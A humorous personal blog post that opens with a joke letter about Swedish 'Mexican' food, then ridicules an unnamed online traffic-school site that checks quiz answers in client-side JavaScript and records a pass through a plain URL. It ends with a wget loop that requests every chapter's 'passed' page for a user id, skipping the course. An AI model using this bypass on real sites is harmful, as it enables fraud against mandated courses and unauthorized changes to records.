Seanius.net

dear sweden

dear sweden,

in the spirit of Cinco de Mayo and a recent visit to the local "Mexican Restaurant", it should be brought to your attention that the following items are not typically considered mexican food:

• lamb and lentil stew
• hummus
• pizza salad
• taco pie

yours truly,
        sean

ur doin it wrong

...or how not to code your web application plzkthx.

so last summer, whilst back home chillin with the peeps, i had a most unfortunate traffic enforcement related incident, the details of which are entirely uninteresting but which left me approximately $400 poorer nonetheless. although it presently doesn't affect me to have such infractions on my record (what not owning a car and living on a different continent and everything), i decided to get my record clean via online traffic school. thankfully, the state of california in their infinite wisdom has decided to outsource such a service to anyone willing to pony up the money for a permit and a domain name, thus there were a number of options from which i the consumer could select.

so, off i went in search of an agreable online service to clear my ticket, with an emphasis towards fast, cheap, and ideally not too dressed up in flash/java. i ended up settling on a to-remain-unnamed .com site whose name seemed to suggest that it was capable of meeting my requisite goals. the site was decidedly "web 1.0", which was sort of what i was looking for, but this was like something written in the mid 90's with an HTML 3.5 book or something. but i digress.

the format of the "traffic school" was a 12 chapter lesson book, with alternating "text" and multiple-choice "quiz" subsections. the text was maybe 10 minutes worth of reading and the quiz another 10 minutes. the site let you freely go back and forth between the text and quiz, and you could do this all at your own pace, so really you could skip the text and answer the questions directly. what more, if you didn't answer enough questions to advance to the next chapter, you could re-take the quiz at no penalty. of course all of these aspects were proudly and prominently listed on the site, and played a significant part in my decision to use the site. so... so far, so good.

however, after making my way a few chapters in, i came across a rather annoying bug in the site, which caused the answers to the quiz to be reset to blank just as i hit the "submit" button. the first time i thought i must have done something wrong, so i tried again. and again. great. thank you so much for wasting my precious time.

it was pretty clear that there was some sketchy use of javascript going on, so i thought i would take a look-see at the code. turns out the "submit" button didn't submit anything at all, but instead calculated a score based on answers that were stored in the web page itself:

ans[1]="1"; ans[2]="2";ans[3]="1";ans[4]="3";ans[5]="4";ans[6]="1";ans[7]="1";ans[8]="1";ans[9]="1";ans[10]="1";
ans[11] = "2";
function Engine(question, answer) {
        if (answer == ans[question])
	{        done[question] = 1;
	}else
	{        done[question] = 0;
	}
	score = done[1]+done[2]+done[3]+done[4]+done[5]+done[6]+done[7]+done[8]+done[9]+done[10]+done[11];
}

heh. it doesn't take a professional programmer to figure out what's going on there. but wait... it gets better. this is the function that gets called when the quiz is "submitted":

function display() {
document.forms[0].reset() ;
document.forms[1].reset() ;
document.forms[2].reset() ;
document.forms[3].reset() ;
document.forms[4].reset() ;
document.forms[5].reset() ;
document.forms[6].reset() ;
document.forms[7].reset() ;
document.forms[8].reset() ;
document.forms[9].reset() ;
document.forms[10].reset() ;
if (score==11)
{

	window.location="passed5.php?id=XXXX"

}
else
{
	window.location="result5.php?id=XXXX"

}
}

where XXXX is a unique identifier for the particular user. in other words, if some javascript decides you have reached a certain score, it redirects your browser to a "you've passed" page, which will record your success no questions asked before forwarding you to the next chapter. now, what do you suppose the following snippet of shell script might do?

# i leave it as an exercise to the reader to find the correct value for ${site}
for n in `seq 1 12`; do
  wget --user-agent "l33t h4x0r" -O/dev/null http://${site}/passed${n}.php?id=XXXX
done

srsly. wtf.

and for the record, i by no means am implying that i might have done such a thing.